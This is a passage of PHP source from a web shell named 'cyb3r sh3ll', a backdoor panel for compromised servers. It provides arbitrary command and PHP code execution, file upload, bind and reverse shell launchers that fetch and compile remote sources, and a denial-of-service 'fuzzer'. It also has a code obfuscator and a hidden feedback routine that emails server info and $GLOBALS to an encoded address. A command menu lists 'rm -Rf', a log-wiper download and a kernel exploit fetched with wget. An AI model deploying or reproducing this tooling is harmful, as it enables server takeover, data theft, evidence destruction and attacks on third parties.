5231 <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr>
5232 <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr>
5233 </table>
5234 </form>
5235
5236 </center></td>
5237
5238 </tr>
5239
5240 </table> <?php
5241 }
5242
5243 if ($act == "nettools")
5244{
5245echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";
5246}
5247
5248 if ($act == "feedback")
5249
5250{
5251
5252 $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");
5253
5254 if (!empty($submit))
5255
5256 {
5257
5258 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
5259
5260 $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
5261
5262 if (!empty($fdbk_ref))
5263
5264 {
5265
5266 $tmp = @ob_get_contents();
5267
5268 ob_clean();
5269
5270 phpinfo();
5271
5272 $phpinfo = base64_encode(ob_get_contents());
5273
5274 ob_clean();
5275
5276 echo $tmp;
5277
5278 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
5279
5280 }
5281
5282 mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
5283
5284 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
5285
5286 }
5287
5288 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
5289
5290}
5291
5292if ($act == "systeminfo") {echo system('systeminfo');}
5293
5294if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); }
5295
5296if ($act == "upload")
5297
5298{
5299 echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>
5300
5301Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
5302
5303Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>
5304
5305File-name (auto-fill): <input name=uploadfilename size=25><br><br>
5306
5307<input type=submit name=submit value=\"Upload\">
5308
5309</form>";
5310$target = $_POST['path'];
5311 $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ;
5312 $ok=1;
5313if (isset($_FILES['uploaded']['name'])) {
5314 if (file_exists($target))
5315 {
5316 echo $_FILES["uploaded"]["name"] . " already exists. ";
5317 }
5318 else
5319 {
5320 if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
5321 {
5322 echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";
5323 echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";
5324 echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";
5325 echo "Stored in: " . $target;
5326 }
5327 else
5328 {
5329 echo "Sorry, there was a problem uploading your file.";
5330 }
5331 }
5332 }
5333}
5334if ($act == "whois")
5335{
5336global $t,$hcwd;
5337if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
5338$server =$_REQUEST['server'];
5339$domain=$_REQUEST['domain']."\r\n";
5340$ser=fsockopen($server,43,$en,$es,5);
5341fputs($ser,$domain);
5342echo "<pre>";
5343while(!feof($ser))echo fgets($ser);
5344echo "</pre>";
5345fclose($ser);
5346}
5347else{
5348echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
5349}
5350}
5351
5352
5353
5354if ($act == "cracker")
5355{
5356 echo "
5357<br><center>
5358<a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>
5359<a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>
5360<a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>
5361<a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>
5362<a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>
5363<a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>
5364<a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>
5365<a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>
5366<a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>
5367<a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>
5368<a href=\"".$surl."act=dic\" >Dictionary Maker</a>
5369</center><br>";
5370}
5371
5372if ($act == "shells")
5373{ ?>
5374<TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
5375 <tr> <!-- 1 -->
5376 <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>
5377 <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>
5378
5379 </tr>
5380 <tr><!-- 2 -->
5381 <td valign="top" ><center>
5382 <?php
5383
5384 $bndportsrcs = array(
5385
5386 "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),
5387
5388 "cyb3r_bindport.c"=>array("Using C","%path %port %pass")
5389
5390 );
5391
5392 $bcsrcs = array(
5393
5394 "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),
5395
5396 "cyb3r_backconn.c"=>array("Using C","%path %host %port")
5397
5398 );
5399
5400 $dpsrcs = array(
5401
5402 "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
5403
5404 "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
5405
5406 );
5407
5408 if (!is_array($bind)) {$bind = array();}
5409
5410 if (!is_array($bc)) {$bc = array();}
5411
5412 if (!is_array($datapipe)) {$datapipe = array();}
5413
5414
5415
5416 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
5417
5418 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
5419
5420
5421
5422 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
5423
5424 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
5425
5426
5427
5428 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
5429
5430 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
5431
5432 if (!empty($bindsubmit))
5433
5434 {
5435
5436 echo "<b>Result of binding port:</b><br>";
5437
5438 $v = $bndportsrcs[$bind["src"]];
5439
5440 if (empty($v)) {echo "Unknown file!<br>";}
5441
5442 elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
5443
5444 else
5445
5446 {
5447
5448 $w = explode(".",$bind["src"]);
5449
5450 $ext = $w[count($w)-1];
5451
5452 unset($w[count($w)-1]);
5453
5454 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5455
5456 $binpath = $tmpdir.join(".",$w).rand(0,999);
5457
5458 if ($ext == "pl") {$binpath = $srcpath;}
5459
5460 @unlink($srcpath);
5461
5462 $fp = fopen($srcpath,"ab+");
5463
5464 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5465
5466 elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";}
5467
5468 else
5469
5470 {
5471
5472 fwrite($fp,$data,strlen($data));
5473
5474 fclose($fp);
5475
5476 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5477
5478 $v[1] = str_replace("%path",$binpath,$v[1]);
5479
5480 $v[1] = str_replace("%port",$bind["port"],$v[1]);
5481
5482 $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
5483
5484 $v[1] = str_replace("//","/",$v[1]);
5485
5486 $retbind = myshellexec($v[1]." > /dev/null &");
5487
5488 sleep(5);
5489
5490 $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
5491
5492 if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
5493
5494 else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
5495
5496 }
5497
5498 echo "<br>";
5499
5500 }
5501
5502 }
5503
5504 if (!empty($bcsubmit))
5505
5506 {
5507
5508 echo "<b>Result of back connection:</b><br>";
5509
5510 $v = $bcsrcs[$bc["src"]];
5511
5512 if (empty($v)) {echo "Unknown file!<br>";}
5513
5514 else
5515
5516 {
5517
5518 $w = explode(".",$bc["src"]);
5519
5520 $ext = $w[count($w)-1];
5521
5522 unset($w[count($w)-1]);
5523
5524 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5525
5526 $binpath = $tmpdir.join(".",$w).rand(0,999);
5527
5528 if ($ext == "pl") {$binpath = $srcpath;}
5529
5530 @unlink($srcpath);
5531
5532 $fp = fopen($srcpath,"ab+");
5533
5534 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5535
5536 elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";}
5537
5538 else
5539
5540 {
5541
5542 fwrite($fp,$data,strlen($data));
5543
5544 fclose($fp);
5545
5546 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5547
5548 $v[1] = str_replace("%path",$binpath,$v[1]);
5549
5550 $v[1] = str_replace("%host",$bc["host"],$v[1]);
5551
5552 $v[1] = str_replace("%port",$bc["port"],$v[1]);
5553
5554 $v[1] = str_replace("//","/",$v[1]);
5555
5556 $retbind = myshellexec($v[1]." > /dev/null &");
5557
5558 echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
5559
5560 }
5561
5562 }
5563
5564 }
5565
5566 if (!empty($dpsubmit))
5567
5568 {
5569
5570 echo "<b>Result of datapipe-running:</b><br>";
5571
5572 $v = $dpsrcs[$datapipe["src"]];
5573
5574 if (empty($v)) {echo "Unknown file!<br>";}
5575
5576 elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
5577
5578 else
5579
5580 {
5581
5582 $srcpath = $tmpdir.$datapipe["src"];
5583
5584 $w = explode(".",$datapipe["src"]);
5585
5586 $ext = $w[count($w)-1];
5587
5588 unset($w[count($w)-1]);
5589
5590 $srcpath = join(".",$w).".".rand(0,999).".".$ext;
5591
5592 $binpath = $tmpdir.join(".",$w).rand(0,999);
5593
5594 if ($ext == "pl") {$binpath = $srcpath;}
5595
5596 @unlink($srcpath);
5597
5598 $fp = fopen($srcpath,"ab+");
5599
5600 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
5601
5602 elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";}
5603
5604 else
5605
5606 {
5607
5608 fwrite($fp,$data,strlen($data));
5609
5610 fclose($fp);
5611
5612 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
5613
5614 list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
5615
5616 $v[1] = str_replace("%path",$binpath,$v[1]);
5617
5618 $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
5619
5620 $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
5621
5622 $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
5623
5624 $v[1] = str_replace("//","/",$v[1]);
5625
5626 $retbind = myshellexec($v[1]." > /dev/null &");
5627
5628 sleep(5);
5629
5630 $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
5631
5632 if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
5633
5634 else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
5635
5636 }
5637
5638 echo "<br>";
5639
5640 }
5641
5642 }
5643
5644 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
5645
5646 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5647
5648 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
5649
5650<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
5651
5652foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5653
5654?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
5655
5656Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
5657
5658<b>Datapipe:</b><br>
5659<form action="<?php echo $surl; ?>">
5660<input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
5661
5662foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
5663
5664?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.
5665
5666
5667
5668
5669 </center></td>
5670
5671 <td ><center>
5672 <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>
5673
5674<form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>
5675<div align="center">Useful Commands </div>
5676
5677
5678 <form action="<?php echo $surl; ?>">
5679
5680 <div align="center">
5681
5682 <input type=hidden name=act value="cmd">
5683
5684 <input type=hidden name="d" value="<?php echo $dispd; ?>">
5685
5686 <SELECT NAME="cmd">
5687
5688 <OPTION VALUE="uname -a">Kernel version</option>
5689
5690 <OPTION VALUE="w">Logged in users</option>
5691
5692 <OPTION VALUE="lastlog">Last to connect</option>
5693
5694 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
5695
5696 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
5697
5698 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
5699
5700 <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>
5701
5702 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>
5703
5704 <OPTION VALUE="netstat -atup | grep IST">Open ports</option>
5705
5706 <OPTION VALUE="locate gcc">gcc installed?</option>
5707
5708 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>
5709
5710 <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>
5711
5712 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>
5713
5714 <OPTION VALUE="./zap2">WIPELOGS PT3</option>
5715
5716 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>
5717
5718 <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>
5719
5720 <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>
5721
5722 <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>
5723
5724 <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>
5725
5726 <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>
5727
5728 </SELECT>
5729
5730 <input type=hidden name="cmd_txt" value="1">
5731
5732 &nbsp;
5733
5734 <input type=submit name=submit value="Execute">
5735
5736 <br>
5737
5738 Warning. Kernel may be alerted using higher levels </div>
5739
5740 </form>
5741
5742 </center>
5743 </td>
5744
5745 </tr>
5746
5747 </table><?php
5748
5749}
5750
5751if ($act == "cmd")
5752
5753{
5754
5755if (trim($cmd) == "ps -aux") {$act = "processes";}
5756
5757elseif (trim($cmd) == "tasklist") {$act = "processes";}
5758
5759else
5760
5761{
5762
5763 @chdir($chdir);
5764
5765 if (!empty($submit))
5766
5767 {
5768
5769 echo "<b>Result of execution this command</b>:<br>";
5770
5771 $olddir = realpath(".");
5772
5773 @chdir($d);
5774
5775 $ret = myshellexec($cmd);
5776
5777 $ret = convert_cyr_string($ret,"d","w");
5778
5779 if ($cmd_txt)
5780
5781 {
5782
5783 $rows = count(explode("\r\n",$ret))+1;
5784
5785 if ($rows < 10) {$rows = 10;}
5786
5787 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
5788
5789 }
5790
5791 else {echo $ret."<br>";}
5792
5793 @chdir($olddir);
5794
5795 }
5796
5797 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
5798
5799 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
5800
5801}
5802
5803}
5804
5805if ($act == "phpcode")
5806{
5807 echo "
5808<br><center>
5809<a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>
5810<a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>
5811<a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>
5812<a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>
5813</center><br>";
5814}
5815
5816if ($act == "eval")
5817
5818{
5819
5820 if (!empty($eval))
5821
5822 {
5823
5824 echo "<b>Result of execution this PHP-code</b>:<br>";
5825
5826 $tmp = ob_get_contents();
5827
5828 $olddir = realpath(".");
5829
5830 @chdir($d);
5831
5832 if ($tmp)
5833
5834 {
5835
5836 ob_clean();
5837
5838 eval($eval);
5839
5840 $ret = ob_get_contents();
5841
5842 $ret = convert_cyr_string($ret,"d","w");
5843
5844 ob_clean();
5845
5846 echo $tmp;
5847
5848 if ($eval_txt)
5849
5850 {
5851
5852 $rows = count(explode("\r\n",$ret))+1;
5853
5854 if ($rows < 10) {$rows = 10;}
5855
5856 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
5857
5858 }
5859
5860 else {echo $ret."<br>";}
5861
5862 }
5863
5864 else
5865
5866 {
5867
5868 if ($eval_txt)
5869
5870 {
5871
5872 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
5873
5874 eval($eval);
5875
5876 echo "</textarea>";
5877
5878 }
5879
5880 else {echo $ret;}
5881
5882 }
5883
5884 @chdir($olddir);
5885
5886 }
5887
5888 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
5889
5890 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
5891
5892}
5893
5894if ($act == "proxy")
5895{
5896global $errorbox,$et,$footer,$hcwd;
5897echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
5898if (!empty($_REQUEST['urL'])){
5899$dir="";
5900$u=parse_url($_REQUEST['urL']);
5901$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
5902if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
5903$url=@fsockopen($host, 80, $errno, $errstr, 12);
5904if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
5905fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
5906while(!feof($url)){
5907$con = fgets($url);
5908$con = str_replace("href=mailto","HrEf=mailto",$con);
5909$con = str_replace("HREF=mailto","HrEf=mailto",$con);
5910$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
5911$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
5912$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
5913$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
5914$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5915$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5916$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5917$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
5918$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
5919$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
5920$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5921$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5922$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5923$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5924$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5925$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
5926echo $con;
5927}
5928fclose($url);
5929}
5930}
5931
5932
5933if ($act == "obfuscate")
5934{
5935 if ( isset($_POST['code']) &&
5936 $_POST['code'] != '')
5937 {
5938 $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
5939 $encode = '
5940<?php
5941$encoded = \''.$encoded.'\';
5942eval(gzinflate(base64_decode($encoded)));
5943// Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.
5944?>
5945';
5946 }
5947 else
5948 {
5949 $encode = 'Please Enter your Code! and Click Submit! :)';
5950 }?>
5951 <form method="POST">
5952 <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
5953 <input style="margin: 20px; margin-left: 50px; padding: 10px;" class="own" type="submit" value="Encode :D"/>
5954 </form>
5955 <?php
5956}
5957
5958if ($act == "fuzzer")
5959{
5960 if(isset($_POST['ip']) &&
5961 isset($_POST['port']) &&
5962 isset($_POST['times']) &&
5963 isset($_POST['time']) &&
5964 isset($_POST['message']) &&
5965 isset($_POST['messageMultiplier']) &&
5966 $_POST['message'] != "" &&
5967 $_POST['time'] != "" &&
5968 $_POST['times'] != "" &&
5969 $_POST['port'] != "" &&
5970 $_POST['ip'] != "" &&
5971 $_POST['messageMultiplier'] != ""
5972 )
5973 {
5974 $IP=$_POST['ip'];
5975 $port=$_POST['port'];
5976 $times = $_POST['times'];
5977 $timeout = $_POST['time'];
5978 $send = 0;
5979 $ending = "";
5980 $multiplier = $_POST['messageMultiplier'];
5981 $data = "";
5982 $mode="tcp";
5983 $data .= "POST /";
5984 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
5985 if($_POST['type'] == "tcp")
5986 {
5987 $mode = "tcp";
5988 }
5989 while($multiplier--)
5990 {
5991 $data .= urlencode($_POST['message']);
5992 }
5993 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
5994 $data .= "by-cyb3r-sh3ll".$ending;
5995 $length = strlen($data);
5996
5997
5998 echo "Sending Data :- <br /> <p align='center'>$data</p>";
5999
6000 print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";
6001 for($i=0;$i<$times;$i++)
6002 {
6003 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
6004 if($socket)
6005 {
6006 fwrite($socket , $data , $length );
6007 fclose($socket);
6008 }
6009 }
6010 echo "<script>alert('Fuzzing Completed!');</script>";
6011 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
6012 echo "Total Number of Packets Sent : " . $times . "<br />";
6013 echo "Total Data Sent = ". showsizE($times*$length) . "<br />";
6014 echo "Data per packet = " . showsizE($length) . "<br />";
6015 }
6016 else
6017 {
6018 ?>
6019 <form method="POST">
6020 <input type="hidden" name="fuzz" />
6021 <table id="margins">
6022 <tr>
6023 <td width="400" class="title">
6024 IP
6025 </td>
6026 <td>
6027 <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
6028 </td>
6029 </tr>
6030
6031 <tr>
6032 <td class="title">
6033 Port
6034 </td>
6035 <td>
6036 <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
6037 </td>
6038 </tr>
6039
6040 <tr>
6041 <td class="title">
6042 Timeout
6043 </td>
6044 <td>
6045 <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
6046 </td>
6047 </tr>
6048
6049
6050 <tr>
6051 <td class="title">
6052 No of times
6053 </td>
6054 <td>
6055 <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
6056 </td>
